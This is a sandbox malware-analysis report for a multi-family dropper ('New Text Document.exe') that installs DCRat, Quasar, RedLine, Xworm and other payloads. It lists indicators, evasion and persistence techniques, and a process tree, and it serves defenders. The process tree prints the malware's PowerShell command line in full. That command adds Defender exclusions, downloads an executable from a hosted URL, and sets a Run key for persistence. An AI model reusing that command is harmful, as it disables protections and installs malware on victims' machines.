dcrat | 98e895f711226a32bfab152e224279d859799243845c46e550c2d32153c619fc

Resubmissions

09-04-2024 13:27

240409-qqa5hsbd5t 10

09-04-2024 13:27

09-04-2024 13:27

09-04-2024 13:27

18-11-2023 14:44

Analysis

max time kernel
32s
max time network
256s
platform
windows11-21h2_x64
resource
win11-20240221-en
resource tags

arch:x64arch:x86image:win11-20240221-enlocale:en-usos:windows11-21h2-x64system
submitted
09-04-2024 13:27

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

New Text Document.exe
Size

4KB
MD5

a239a27c2169af388d4f5be6b52f272c
SHA1

0feb9a0cd8c25f01d071e9b2cfc2ae7bd430318c
SHA256

98e895f711226a32bfab152e224279d859799243845c46e550c2d32153c619fc
SHA512

f30e1ff506cc4d729f7e24aa46e832938a5e21497f1f82f1b300d47f45dae7f1caef032237ef1f5ae9001195c43c0103e3ab787f9196c8397846c1dea8f351da
SSDEEP

48:6r1huik0xzYGJZZJOQOulbfSqXSfbNtm:IIxcLpf6zNt

Score

10^/10

dcrat quasar redline xworm zgrat 6077866846 discovery evasion infostealer persistence pyinstaller rat spyware stealer themida trojan

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://trello.com/1/cards/660a48f3ed8f660125aa4d31/attachments/66153d5497afda6d323e73ae/download/5885.exe

Extracted

Family

redline

Botnet

6077866846

https://pastebin.com/raw/KE5Mft0T

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

Detect Xworm Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\svchost.exe	family_xworm
C:\Users\Admin\AppData\Local\Temp\a\BrawlB0t.exe	family_xworm

Detect ZGRat V1 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\alexxxxxxxx.exe	family_zgrat_v1

Process spawned unexpected child process 39 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5736	2900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5048	2900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5724	2900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5132	2900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5624	2900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2132	2900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2656	2900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	784	2900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2292	2900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	572	2900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5804	2900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5268	2900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2492	2900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2964	2900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4780	2900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5128	2900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1428	2900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5924	2900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6028	2900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3336	2900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5300	2900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6140	2900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3932	2900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5988	2900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2132	2900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6120	2900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5836	2900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4520	2900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	6064	2900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4292	2900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4292	2900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2292	2900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5324	2900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5504	2900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5980	2900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	980	2900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4204	2900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5888	2900	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5340	2900	schtasks.exe

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\ghhjhjhsg.exe	family_quasar

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 4 IoCs

Processes:

resource	yara_rule
behavioral4/memory/2212-78-0x0000000000790000-0x00000000007B2000-memory.dmp	family_redline
C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe	family_redline
C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\a\new1.exe	family_redline

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

DCRat payload 2 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\IjerkOff.exe	dcrat
C:\BlockComponentwebMonitordhcp\powershell.exe	dcrat

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

Processes:

mQxBvlTA.exe

description ioc process

Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ mQxBvlTA.exe
Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	mQxBvlTA.exe

.NET Reactor proctector 1 IoCs

Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\Locker.exe	net_reactor

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

mQxBvlTA.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	mQxBvlTA.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	mQxBvlTA.exe

Executes dropped EXE 17 IoCs

Processes:

cccc.exemQxBvlTA.exexIPJVPDq.exeORQCYJZO.execrypted6077866846MVYQY.exei1gcbW1E.exewininit.exe1234.exeISetup8.exetest2.exe1111.exeISetup2.exeTester.exeu1og.0.exesvchost.exeu1og.1.exeu254.0.exe

pid	process
484	cccc.exe
3984	mQxBvlTA.exe
4700	xIPJVPDq.exe
2548	ORQCYJZO.exe
2212	crypted6077866846MVYQY.exe
4148	i1gcbW1E.exe
2532	wininit.exe
4916	1234.exe
2176	ISetup8.exe
4896	test2.exe
828	1111.exe
2776	ISetup2.exe
3588	Tester.exe
2880	u1og.0.exe
3848	svchost.exe
1060	u1og.1.exe
1844	u254.0.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Themida packer 3 IoCs

Detects Themida, an advanced Windows software protection system.

themida

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\mQxBvlTA.exe	themida
behavioral4/memory/3984-93-0x0000000000550000-0x000000000166C000-memory.dmp	themida
behavioral4/memory/3984-95-0x0000000000550000-0x000000000166C000-memory.dmp	themida

Unexpected DNS network traffic destination 1 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.

Processes:

description ioc

Destination IP 152.89.198.214
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Checks whether UAC is enabled 1 TTPs 1 IoCs
evasion trojan

System Information Discovery
T1082

Processes:

mQxBvlTA.exe

description ioc process

Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mQxBvlTA.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service
T1102

Processes:

flow ioc

1 raw.githubusercontent.com
3 pastebin.com
7 raw.githubusercontent.com
10 pastebin.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

1 ip-api.com

description	ioc
Destination IP	152.89.198.214

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	mQxBvlTA.exe

flow	ioc
1	raw.githubusercontent.com
3	pastebin.com
7	raw.githubusercontent.com
10	pastebin.com

flow	ioc
1	ip-api.com

AutoIT Executable 2 IoCs

AutoIT scripts compiled to PE executables.

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\wininit.exe	autoit_exe
C:\Users\Admin\AppData\Local\Temp\a\medcallaboratory5.exe	autoit_exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

mQxBvlTA.exe

pid process

3984 mQxBvlTA.exe
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exe

pid process

5904 sc.exe
3364 sc.exe
3432 sc.exe
5048 sc.exe

pid	process
3984	mQxBvlTA.exe

pid	process
5904	sc.exe
3364	sc.exe
3432	sc.exe
5048	sc.exe

Detects Pyinstaller 2 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\a\Pgp-Soft.exe	pyinstaller
C:\Users\Admin\AppData\Local\Temp\ckz_5Y3H\nds.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 19 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2896	2176	WerFault.exe	ISetup8.exe
4108	1844	WerFault.exe	u254.0.exe
1640	4124	WerFault.exe	Adobe_update.exe
5980	5500	WerFault.exe	syncUpd.exe
5376	2672	WerFault.exe	1111.exe
232	5328	WerFault.exe	mstsc.exe
5184	5892	WerFault.exe	crypted_097f1784.exe
4176	776	WerFault.exe	Jufrxnb.exe
5736	3000	WerFault.exe	Jufrxnb.exe
2936	5272	WerFault.exe	crypted_33cb9091.exe
1824	6000	WerFault.exe	Jufrxnb.exe
3720	5488	WerFault.exe	u4dc.0.exe
312	5664	WerFault.exe	ISetup5.exe
5376	5664	WerFault.exe	ISetup5.exe
3900	2944	WerFault.exe	u4qc.0.exe
320	6132	WerFault.exe	ISetup1.exe
5480	6132	WerFault.exe	ISetup1.exe
4816	5820	WerFault.exe	crypted_69a30000.exe
4644	4472	WerFault.exe	current.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

u1og.1.exe

description	ioc	process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u1og.1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u1og.1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	u1og.1.exe

Creates scheduled task(s) 1 TTPs 48 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

Processes:

pid	process
4520	schtasks.exe
4292	schtasks.exe
4388	schtasks.exe
4540	schtasks.exe
5400	schtasks.exe
6028	schtasks.exe
6120	schtasks.exe
5836	schtasks.exe
3292	schtasks.exe
5968	schtasks.exe
5724	schtasks.exe
2656	schtasks.exe
2964	schtasks.exe
5128	schtasks.exe
2132	schtasks.exe
6064	schtasks.exe
5804	schtasks.exe
2492	schtasks.exe
4780	schtasks.exe
5300	schtasks.exe
6140	schtasks.exe
3932	schtasks.exe
980	schtasks.exe
5888	schtasks.exe
2132	schtasks.exe
2292	schtasks.exe
3336	schtasks.exe
5504	schtasks.exe
4204	schtasks.exe
784	schtasks.exe
5268	schtasks.exe
5924	schtasks.exe
5988	schtasks.exe
5904	schtasks.exe
5340	schtasks.exe
5500	schtasks.exe
5736	schtasks.exe
5132	schtasks.exe
572	schtasks.exe
1428	schtasks.exe
5324	schtasks.exe
5812	schtasks.exe
5048	schtasks.exe
5624	schtasks.exe
4292	schtasks.exe
3880	schtasks.exe
2292	schtasks.exe
5980	schtasks.exe

Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

5532 timeout.exe
940 timeout.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

5504 PING.EXE

pid	process
5532	timeout.exe
940	timeout.exe

pid	process
5504	PING.EXE

Suspicious behavior: EnumeratesProcesses 48 IoCs

Processes:

cccc.exepowershell.exexIPJVPDq.exeORQCYJZO.execrypted6077866846MVYQY.exeTester.exepowershell.exesvchost.exepowershell.exe

pid	process
484	cccc.exe
3872	powershell.exe
4700	xIPJVPDq.exe
4700	xIPJVPDq.exe
4700	xIPJVPDq.exe
4700	xIPJVPDq.exe
2548	ORQCYJZO.exe
2548	ORQCYJZO.exe
3872	powershell.exe
2212	crypted6077866846MVYQY.exe
2548	ORQCYJZO.exe
2548	ORQCYJZO.exe
2212	crypted6077866846MVYQY.exe
2212	crypted6077866846MVYQY.exe
2212	crypted6077866846MVYQY.exe
2212	crypted6077866846MVYQY.exe
3588	Tester.exe
3588	Tester.exe
2212	crypted6077866846MVYQY.exe
3588	Tester.exe
3588	Tester.exe
3588	Tester.exe
3588	Tester.exe
3588	Tester.exe
3588	Tester.exe
3588	Tester.exe
3588	Tester.exe
3588	Tester.exe
3588	Tester.exe
3588	Tester.exe
3588	Tester.exe
3588	Tester.exe
3588	Tester.exe
3588	Tester.exe
3588	Tester.exe
3588	Tester.exe
3588	Tester.exe
3588	Tester.exe
3588	Tester.exe
3588	Tester.exe
704	powershell.exe
704	powershell.exe
3848	svchost.exe
3848	svchost.exe
704	powershell.exe
4492	powershell.exe
4492	powershell.exe
4492	powershell.exe

Suspicious use of AdjustPrivilegeToken 15 IoCs

Processes:

New Text Document.execccc.exexIPJVPDq.exepowershell.exeORQCYJZO.execrypted6077866846MVYQY.exemQxBvlTA.exeTester.exesvchost.exepowershell.exevssvc.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4788	New Text Document.exe
Token: SeDebugPrivilege	484	cccc.exe
Token: SeDebugPrivilege	4700	xIPJVPDq.exe
Token: SeDebugPrivilege	3872	powershell.exe
Token: SeDebugPrivilege	2548	ORQCYJZO.exe
Token: SeDebugPrivilege	2212	crypted6077866846MVYQY.exe
Token: SeDebugPrivilege	3984	mQxBvlTA.exe
Token: SeDebugPrivilege	3588	Tester.exe
Token: SeDebugPrivilege	3848	svchost.exe
Token: SeDebugPrivilege	704	powershell.exe
Token: SeDebugPrivilege	3848	svchost.exe
Token: SeBackupPrivilege	4688	vssvc.exe
Token: SeRestorePrivilege	4688	vssvc.exe
Token: SeAuditPrivilege	4688	vssvc.exe
Token: SeDebugPrivilege	4492	powershell.exe

Suspicious use of FindShellTrayWindow 9 IoCs

Processes:

wininit.exeu1og.1.exe

pid process

2532 wininit.exe
2532 wininit.exe
1060 u1og.1.exe
1060 u1og.1.exe
1060 u1og.1.exe
1060 u1og.1.exe
1060 u1og.1.exe
1060 u1og.1.exe
1060 u1og.1.exe
Suspicious use of SendNotifyMessage 9 IoCs

Processes:

wininit.exeu1og.1.exe

pid process

2532 wininit.exe
2532 wininit.exe
1060 u1og.1.exe
1060 u1og.1.exe
1060 u1og.1.exe
1060 u1og.1.exe
1060 u1og.1.exe
1060 u1og.1.exe
1060 u1og.1.exe
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

svchost.exe

pid process

3848 svchost.exe

pid	process
2532	wininit.exe
2532	wininit.exe
1060	u1og.1.exe
1060	u1og.1.exe
1060	u1og.1.exe
1060	u1og.1.exe
1060	u1og.1.exe
1060	u1og.1.exe
1060	u1og.1.exe

pid	process
2532	wininit.exe
2532	wininit.exe
1060	u1og.1.exe
1060	u1og.1.exe
1060	u1og.1.exe
1060	u1og.1.exe
1060	u1og.1.exe
1060	u1og.1.exe
1060	u1og.1.exe

pid	process
3848	svchost.exe

Suspicious use of WriteProcessMemory 58 IoCs

Processes:

New Text Document.execccc.execmd.exexIPJVPDq.exeISetup8.exeISetup2.exesvchost.exepowershell.exeTester.exe

description	pid	process	target process
PID 4788 wrote to memory of 484	4788	New Text Document.exe	cccc.exe
PID 4788 wrote to memory of 484	4788	New Text Document.exe	cccc.exe
PID 4788 wrote to memory of 484	4788	New Text Document.exe	cccc.exe
PID 484 wrote to memory of 2256	484	cccc.exe	cmd.exe
PID 484 wrote to memory of 2256	484	cccc.exe	cmd.exe
PID 484 wrote to memory of 2256	484	cccc.exe	cmd.exe
PID 2256 wrote to memory of 3872	2256	cmd.exe	powershell.exe
PID 2256 wrote to memory of 3872	2256	cmd.exe	powershell.exe
PID 2256 wrote to memory of 3872	2256	cmd.exe	powershell.exe
PID 4788 wrote to memory of 3984	4788	New Text Document.exe	mQxBvlTA.exe
PID 4788 wrote to memory of 3984	4788	New Text Document.exe	mQxBvlTA.exe
PID 4788 wrote to memory of 3984	4788	New Text Document.exe	mQxBvlTA.exe
PID 4788 wrote to memory of 4700	4788	New Text Document.exe	xIPJVPDq.exe
PID 4788 wrote to memory of 4700	4788	New Text Document.exe	xIPJVPDq.exe
PID 4788 wrote to memory of 4700	4788	New Text Document.exe	xIPJVPDq.exe
PID 4700 wrote to memory of 2548	4700	xIPJVPDq.exe	ORQCYJZO.exe
PID 4700 wrote to memory of 2548	4700	xIPJVPDq.exe	ORQCYJZO.exe
PID 4788 wrote to memory of 2212	4788	New Text Document.exe	crypted6077866846MVYQY.exe
PID 4788 wrote to memory of 2212	4788	New Text Document.exe	crypted6077866846MVYQY.exe
PID 4788 wrote to memory of 2212	4788	New Text Document.exe	crypted6077866846MVYQY.exe
PID 4788 wrote to memory of 4148	4788	New Text Document.exe	i1gcbW1E.exe
PID 4788 wrote to memory of 4148	4788	New Text Document.exe	i1gcbW1E.exe
PID 4788 wrote to memory of 2532	4788	New Text Document.exe	wininit.exe
PID 4788 wrote to memory of 2532	4788	New Text Document.exe	wininit.exe
PID 4788 wrote to memory of 2532	4788	New Text Document.exe	wininit.exe
PID 4788 wrote to memory of 4916	4788	New Text Document.exe	1234.exe
PID 4788 wrote to memory of 4916	4788	New Text Document.exe	1234.exe
PID 4788 wrote to memory of 4916	4788	New Text Document.exe	1234.exe
PID 4788 wrote to memory of 2176	4788	New Text Document.exe	ISetup8.exe
PID 4788 wrote to memory of 2176	4788	New Text Document.exe	ISetup8.exe
PID 4788 wrote to memory of 2176	4788	New Text Document.exe	ISetup8.exe
PID 4788 wrote to memory of 4896	4788	New Text Document.exe	test2.exe
PID 4788 wrote to memory of 4896	4788	New Text Document.exe	test2.exe
PID 4788 wrote to memory of 828	4788	New Text Document.exe	1111.exe
PID 4788 wrote to memory of 828	4788	New Text Document.exe	1111.exe
PID 4788 wrote to memory of 2776	4788	New Text Document.exe	ISetup2.exe
PID 4788 wrote to memory of 2776	4788	New Text Document.exe	ISetup2.exe
PID 4788 wrote to memory of 2776	4788	New Text Document.exe	ISetup2.exe
PID 2176 wrote to memory of 2880	2176	ISetup8.exe	u1og.0.exe
PID 2176 wrote to memory of 2880	2176	ISetup8.exe	u1og.0.exe
PID 2176 wrote to memory of 2880	2176	ISetup8.exe	u1og.0.exe
PID 4788 wrote to memory of 3588	4788	New Text Document.exe	Tester.exe
PID 4788 wrote to memory of 3588	4788	New Text Document.exe	Tester.exe
PID 4788 wrote to memory of 3848	4788	New Text Document.exe	svchost.exe
PID 4788 wrote to memory of 3848	4788	New Text Document.exe	svchost.exe
PID 2176 wrote to memory of 1060	2176	ISetup8.exe	WerFault.exe
PID 2176 wrote to memory of 1060	2176	ISetup8.exe	WerFault.exe
PID 2176 wrote to memory of 1060	2176	ISetup8.exe	WerFault.exe
PID 2776 wrote to memory of 1844	2776	ISetup2.exe	u254.0.exe
PID 2776 wrote to memory of 1844	2776	ISetup2.exe	u254.0.exe
PID 2776 wrote to memory of 1844	2776	ISetup2.exe	u254.0.exe
PID 3848 wrote to memory of 4388	3848	svchost.exe	schtasks.exe
PID 3848 wrote to memory of 4388	3848	svchost.exe	schtasks.exe
PID 3872 wrote to memory of 704	3872	powershell.exe	Document.exe
PID 3872 wrote to memory of 704	3872	powershell.exe	Document.exe
PID 3872 wrote to memory of 704	3872	powershell.exe	Document.exe
PID 3588 wrote to memory of 4492	3588	Tester.exe	ghhjhjhsg.exe
PID 3588 wrote to memory of 4492	3588	Tester.exe	ghhjhjhsg.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\New Text Document.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4788

C:\Users\Admin\AppData\Local\Temp\a\cccc.exe
"C:\Users\Admin\AppData\Local\Temp\a\cccc.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:484

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C powershell.exe -Command Add-MpPreference -ExclusionPath %localappdata%; powershell -Command Add-MpPreference -ExclusionProcess "RuntimeBroker2.exe"; powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://trello.com/1/cards/660a48f3ed8f660125aa4d31/attachments/66153d5497afda6d323e73ae/download/5885.exe', 'RuntimeBroker2.exe')"; powershell -Command New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name RuntimeBroker2 -Value %localappdata%'\RuntimeBroker2.exe'; timeout /t 1 >nul;start RuntimeBroker2.exe;
3⤵
- Suspicious use of WriteProcessMemory
PID:2256

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local; powershell -Command Add-MpPreference -ExclusionProcess "RuntimeBroker2.exe"; powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://trello.com/1/cards/660a48f3ed8f660125aa4d31/attachments/66153d5497afda6d323e73ae/download/5885.exe', 'RuntimeBroker2.exe')"; powershell -Command New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name RuntimeBroker2 -Value C:\Users\Admin\AppData\Local'\RuntimeBroker2.exe'; timeout /t 1 ;start RuntimeBroker2.exe;
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3872

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionProcess RuntimeBroker2.exe
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:704

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command
5⤵
PID:4204

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command New-ItemProperty -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run -Name RuntimeBroker2 -Value C:\Users\Admin\AppData\Local\RuntimeBroker2.exe
5⤵
PID:1868

C:\Windows\SysWOW64\timeout.exe
"C:\Windows\system32\timeout.exe" /t 1
5⤵
- Delays execution with timeout.exe
PID:940

C:\Users\Admin\AppData\Local\RuntimeBroker2.exe
"C:\Users\Admin\AppData\Local\RuntimeBroker2.exe"
5⤵
PID:1728

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Remove-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker2';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'RuntimeBroker2' -Value '"C:\Users\Admin\AppData\Local\RuntimeBroker2.exe"' -PropertyType 'String'
6⤵
PID:3372

C:\Users\Admin\AppData\Local\Temp\a\mQxBvlTA.exe
"C:\Users\Admin\AppData\Local\Temp\a\mQxBvlTA.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3984

C:\Users\Admin\AppData\Local\Temp\a\xIPJVPDq.exe
"C:\Users\Admin\AppData\Local\Temp\a\xIPJVPDq.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4700

C:\Users\Admin\AppData\Local\Temp\ORQCYJZO.exe
"C:\Users\Admin\AppData\Local\Temp\ORQCYJZO.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2548

C:\Users\Admin\AppData\Local\Temp\a\crypted6077866846MVYQY.exe
"C:\Users\Admin\AppData\Local\Temp\a\crypted6077866846MVYQY.exe"
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2212

C:\Users\Admin\AppData\Local\Temp\a\i1gcbW1E.exe
"C:\Users\Admin\AppData\Local\Temp\a\i1gcbW1E.exe"
2⤵
- Executes dropped EXE
PID:4148

C:\Users\Admin\AppData\Local\Temp\a\wininit.exe
"C:\Users\Admin\AppData\Local\Temp\a\wininit.exe"
2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2532

C:\Users\Admin\AppData\Local\Temp\a\1234.exe
"C:\Users\Admin\AppData\Local\Temp\a\1234.exe"
2⤵
- Executes dropped EXE
PID:4916

C:\Users\Admin\AppData\Local\Temp\a\ISetup8.exe
"C:\Users\Admin\AppData\Local\Temp\a\ISetup8.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2176

C:\Users\Admin\AppData\Local\Temp\u1og.0.exe
"C:\Users\Admin\AppData\Local\Temp\u1og.0.exe"
3⤵
- Executes dropped EXE
PID:2880

